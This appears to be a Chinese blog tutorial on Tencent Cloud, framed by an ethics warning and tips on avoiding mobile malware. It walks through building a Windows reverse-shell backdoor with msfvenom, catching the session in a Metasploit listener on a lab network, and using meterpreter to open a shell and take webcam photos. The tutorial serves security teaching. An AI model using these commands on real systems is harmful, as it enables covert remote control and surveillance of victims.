前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >MSF恶意程序利用【实战】

MSF恶意程序利用【实战】

作者头像
用户10781703
发布2024-08-19 13:55:39
860
发布2024-08-19 13:55:39
举报
文章被收录于专栏:用户10781703的专栏

★关于道德伦理的忠告★

关于一些网络安全实战内容,我还是不厌其烦的写上这些忠告,请见谅。

以下内容摘自《Metasploit渗透测试指南》

作为一名渗透测试者,我们可以击败安全防御机制,但这是仅仅是我们工作的一部分。当你进行渗透攻击时,请记住如下的忠告:

  • 不要进行恶意的攻击;
  • 不要做傻事;
  • 在没有获得书面授权时,不要攻击任何目标;
  • 考虑你的行为将会带来的后果;
  • 如果你干了些非法的事情,天网恢恢疏而不漏,你总会被抓到牢里的。

1、手机恶意应用程序分析

1.1、手机恶意应用程序理解

手机恶意应用程序:一般是指在用户不完全知情和认可(它包括未经用户许可、强迫引导用户许可或隐瞒关键信息等)的情况下强行安装到用户手机中,或者一旦安装就无法正常卸载和删除,但又具备一定正常功能的软件程序。它是介于病毒和正常软件之间的软件,它与病毒的区别是:一般还具备一定的正常功能。

1.2、危害性

恶意程序中植入的木马程序 ,可在用户不知情的情况下 ,收集用户个人隐私信息、恶意扣费 。

1.3、如何实现?

很多APP由于存在大量安全漏洞和缺乏安全措施,被不法分子二次打包后,或被直接仿冒,或植入广告、恶意代码,甚至加入违法内容,重新投放应用市场,严重危害用户隐私与财产安全,网络“黑产”链条也开始滋生 。

1.4、“官方”八招对付

八招对付恶意软件【来源于人民日报】:

1、选择官方渠道下载

2、关注流量使用

3、谨慎ROOT

4、注意权限信息

5、安装防病毒软件

6、不要在未知安全性的WIFI网络中上网

7、及时止损

8、及时举报

2、MSF恶意程序利用

2.0、说明

因为手机恶意程序利用的实验,我自己没有验证过就暂不做分享,以win7实验做为示例。

2.1、制作window恶意获取shell

后门的生成是为了更好的理解渗透过程中的方法以及途径,进而达到更好的防护,而不是利用技巧去做攻击等不合理的行为

思路:利用社会工程学中人的心理,为某些软件利用msf生成一些后门程序,进而通过带有后门的软件实现渗透获取shell 。

2.1.1、简介

msfvenom是一个Metasploit独立的有效负载生成器,也是msfpayload和msfencode的替代品。是用来生成后门的软件。

实验内容: 制作Windows恶意软件获取shell,msfvenom的shell在windows中的使用 msfvenom生成shell.exe

2.1.2、实验步骤
2.1.2.1、实验环境

kali-linux系统,版本:Linux kali 5.10.0-kali9-amd64,IP:192.168.242.4

win7系统,IP:192.168.242.6

2.1.2.2、生成后门软件

在kali系统生成后门软件,然后先复制到外面(本机),再复制到目标系统win7

代码语言:javascript
复制
msfvenom -p 添加载荷payload LHOST=监听的IP LPORT=监听的端口,只要不占用即可 -f 输出文件格式 > 目标文件的名称

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.242.4 LPORT=6060 -f exe > msftest.exe

注意:该步骤自己电脑的杀毒软件和防火墙需要暂时关闭,如果不想关闭的话,可以利用ms17-010漏洞上传文件到win7电脑,可以参考我前面写的《渗透测试实战-漏洞利用MS17-010》

2.1.2.3、启动侦听

在kali系统操作

代码语言:javascript
复制
# 启动metaspliot
msfconsole

# 启动成功结果--每次的图案不一样,主要关注下面的是否有msf6>  即表示成功
Metasploit tip: Save the current environment with the 
save command, future console restarts will use this 
environment again

msf6 > 

# metasploit设置侦听 加载模块
msf6 > use exploit/multi/handler

# 引用成功结果 ,再在后面
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > 

# 设置payload
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

#设置kali的IP
msf6 exploit(multi/handler) > set lhost kali的ip

#设置kali的端口lport =6060,也就是生成后门的端口
msf6 exploit(multi/handler) > set lport 6060

#执行
msf6 exploit(multi/handler) > exploit 或者 run

# 结果
[*] Started reverse TCP handler on 192.168.242.4:6060 
2.1.2.4、win7系统双击后门软件

win7系统双击后门软件,然后观察kali系统会看到有对应信息串联起来,效果如下

代码语言:javascript
复制
[*] Sending stage (175174 bytes) to 192.168.242.6
[*] Meterpreter session 1 opened (192.168.242.4:6060 -> 192.168.242.6:2327) at 2023-09-11 11:07:36 -0400
2.1.2.4、操作命令控制win7系统
代码语言:javascript
复制
# 输入命令行
meterpreter > shell

# 连接成功
Process 8856 created.
Channel 1 created.

# 退出当前操作
exit

# 可进行拍照,只要目标系统有拍照功能
# 查看摄像头
meterpreter > webcam_list
# 结果表示有
1: Integrated Camera

# 通过摄像头拍照
meterpreter > webcam_snap
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2024-08-17,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • ★关于道德伦理的忠告★
  • 1、手机恶意应用程序分析
    • 1.1、手机恶意应用程序理解
      • 1.2、危害性
        • 1.3、如何实现?
          • 1.4、“官方”八招对付
          • 2、MSF恶意程序利用
            • 2.0、说明
              • 2.1、制作window恶意获取shell
                • 2.1.1、简介
                • 2.1.2、实验步骤
            相关产品与服务
            网站渗透测试
            网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
            领券
            问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档